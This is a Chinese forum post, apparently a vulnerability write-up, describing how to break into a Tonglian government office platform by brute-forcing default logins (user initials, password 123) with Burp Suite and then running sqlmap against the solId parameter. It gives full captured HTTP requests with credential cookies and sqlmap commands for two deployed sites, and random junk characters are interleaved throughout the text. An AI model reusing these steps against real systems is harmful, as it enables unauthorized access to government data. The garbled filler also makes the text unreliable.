|
0 `% D% e" Y8 Q0 `" n
( o7 m2 s! R# e: g
6 f" c( z! X; X O& U2 E0 B/ _
8 b, n6 `. p! C! b/ c
平台简介:
1 K5 l% F: ]2 T4 Z- r 9 ?' _: z/ ~) m; B2 t
+ ? K3 A' g) E. j
5 i' w) L$ ^; m% c( Q, s
" u+ D- Y( Y! ~1 H h8 k3 V
) N( z- J( Y$ s# R& J: C 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
* h2 k1 c7 o+ i% d
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
+ t) A O; R1 |- D3 W0 b3 }% @7 ^9 U
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
, V( J l3 O$ Y8 B+ [
v9 t3 j& G& x1 Q
' D" z- s0 I+ r6 D+ D Z5 O* f- S7 a( j( {
- c) [! i* L& o
, t1 J u4 K7 L. v1 l
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
: I2 U* ?7 f2 v
8 m: K: H) A( N; J9 W% M6 `' o) O5 r0 R& N" g
( H/ N% `, f. ?4 z, ^
5 A$ K# R) s# N% Z! E7 T9 w! A5 N$ o3 A' r1 I7 f
http://1.1.1.1:7197/cap-aco/#(案例2-)* \2 l. f) ]$ V' D: i( `' o6 B# p
7 ^0 |8 s9 P- ^3 n7 g8 g6 t: o' b" w8 L. ]- V( W% ?
http://www.XXOO.com (案例1-官网网站)
3 X8 S% n3 X: {$ M! S ( W) [. b% v8 R) F5 k2 ?
( O: Q# V3 E5 U/ r* O3 D+ l, P
' T; t G! O0 Z% q: ^; n2 q: s
" \4 n/ x6 B+ ~7 v5 Z9 i8 J% ~- Q$ _% x0 u: B. I* y
漏洞详情:, m! G g) r8 z" A+ F) B
" j8 S; N8 V6 Q7 x( a( L+ Y( ~% W* r
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
: F( V5 v1 i' z k6 A/ ], r
e. f S/ |- l) k2 @1 K" V* j6 b5 _" w% h# u. P
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
; L; C9 ^2 e/ W- p" K% Q6 A
7 c& L% r- y% Q* Y; ]
9 L# ?$ i8 w7 u2 d0 W5 n
4 S: a; s5 e# ~7 L' U( Y " v w ]+ |6 y
$ v; @3 E3 `- W- B) P5 i% q 
G F# L6 Z& x7 P6 h2 { 0 I/ i( R/ d* l& r
. c+ j! L% s/ j6 u5 t status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:) M. `( I! A% g) ?
( O# {' C" K5 R- Q& s5 E% _, _
1 s& {* k8 W, R2 j0 _ 1、案例1-官方网站9 S$ n, i4 T3 `; ~3 z+ j1 E" h$ R3 K
4 ?3 p) q( |0 Z9 R+ ^% w7 v3 ]" q1 _
; M% V4 J/ o2 M ] GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
1 I* |' P9 |- U4 D. d Z! ^5 m9 L1 _3 Y4 J# B
y2 ?/ y( `3 d6 t, Q
Host: www.XXOO.com% q, n1 {6 a& x
" F3 i3 @% S3 q/ ]; `0 k
4 M- J1 G4 }+ x" r
Proxy-Connection: Keep-Alive
! Y) z3 P) t; A( K6 j: t
5 Y& F2 ^0 {4 [, M+ @! I, d1 u$ w; q, e, u/ r* O: X
Accept: application/json, text/javascript, */*; q=0.01- z5 J8 Y( K: Q9 \. ^3 f0 w9 Z
8 h1 e% `6 E" ^& k+ U2 x9 R' R4 Y# X# |3 f! k( j6 J" l
Accept-Language: zh-CN6 k% A. c0 Z3 g3 s
7 d3 W2 |' m/ w/ \0 r, H! f
! S6 I' O3 q6 d g, x) m Content-Type: application/json, U1 ?- U& G. ?6 d
/ X3 {& U! e/ i2 A5 x& R' a
) c6 f6 C6 D! V: I1 c User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko! \& \. J$ w3 u5 E2 l7 Z8 r
1 i) I0 r$ f, L5 |
& y& U3 ?2 `) G; @ X-Requested-With: XMLHttpRequest/ C; b$ E5 e* M& o3 q# @1 [ n
8 Z2 ~* P5 t# [
& p" _8 s& Z- S: L( } Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
[: l0 P( f9 O ) n; Y8 F1 U& g3 g, t Z
- t( C: S& }5 B! X% ]4 R Accept-Encoding: gzip, deflate, sdch
, [8 w. a- m |6 C( n5 R0 `
* N: B6 e' ?$ ^" Z* v7 I
, ~+ c) h% P5 c) d* h( f Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e. k- \5 N- S9 U
. P9 M8 W* F L1 ]% g1 B
4 z) ]0 S0 y; H6 Q% ?$ ?% n 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
3 O% Q& C A# | [' O2 w ! Y- i- P' U2 H7 e6 ~+ } Z
' h U& Z# x; a% n( W; E! Z  3 x- _$ v4 r& M+ R
) M6 A/ f+ D$ U* N
7 L- E1 ^$ x. S3 p: j7 q ]. H# c; Y
 ! Q4 l9 k, S. _: m0 [5 g
! P3 m' o, k. F
+ J8 m, S# E8 s2 s4 a
. X" c3 Q- o4 s2 ~ " v$ w; r( ], e
x# h9 W1 U& B% P5 x
4 b0 B3 P8 l) K S. j! `# q
' j$ r. p% E n3 t
4 L' x1 k4 H1 w+ Y n* g
. x x; L9 @9 i1 _ 7 M2 B' O r( h) x9 Y
, o+ s9 Z- A8 i9 B N
2、案例2-某天河云平台3 P0 U/ k/ a( ^; H+ S
6 n/ }1 I2 z$ n5 {$ O S; k8 Z) J. s/ Y9 U/ p q0 B E
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.18 N3 l% ^/ q+ [7 x3 S
* V/ ?7 e6 Y s# n0 u3 r
' l8 I1 h; @, S0 Q1 L: j( j# } Host: 1.1.1.:71970 Q: d; l& K; v$ o5 P* c+ G. ?
3 [( \% P% ^. p2 k
3 w# i9 ^7 F7 ~: V6 k9 Z, c Y, Q6 a
Accept: application/json, text/javascript, */*; q=0.01$ b3 N' i3 x& O
# v0 f3 w3 e' ?- Z
& D* |1 F- }9 n8 g/ ?- ?8 n
X-Requested-With: XMLHttpRequest6 g0 A& k" g1 |, L. q& m# q
" G0 k! A( @3 S* ~- M$ k ^6 _; Q) k- X l" W! l( |) @2 F
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0" T- u; Q/ d! ?5 p. ]& p
- E2 M1 o& q7 h1 d
* T$ \7 g6 T' W% I5 r3 u
Content-Type: application/json
! U- w* {9 L4 r) `5 e* @
' }( |, d! M; n# e" ]% G& V' T# j% y! j' `* R
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
* X$ @! q; R& W7 N7 P$ X1 M- u
. Z" A& Y; G' u% W, i4 v1 N& Y) m- w; a
Accept-Language: zh-CN,zh;q=0.8/ J8 g# a/ @' g
9 S" g( d. `5 b# u7 N/ {. }
9 R6 d$ d4 t! p) h Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
5 P4 {+ J/ u: e4 G6 u& D 4 c$ l1 I( C; e7 O3 a
' C0 {; M! t( f2 t6 o: x2 E Connection: close4 o. ] I$ H: N+ N8 U
, @- C/ }" e8 `% A; v$ x" t" F& j; n+ i! K4 I
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
O7 _+ V5 G' L0 Q4 c+ Q 6 o" U0 O/ f0 x3 {; x
- H J' ]1 c7 Z! o0 [1 R3 c, X \
5 I5 I5 N. Y5 J/ ]3 h6 t$ B6 T
8 F7 X+ o2 r. @
! t% X# @' w+ w; v G4 i/ Q+ O
' g$ ]2 j- l5 o4 [
| 
发表于 2018-10-20 20:15:17
收藏
支持
反对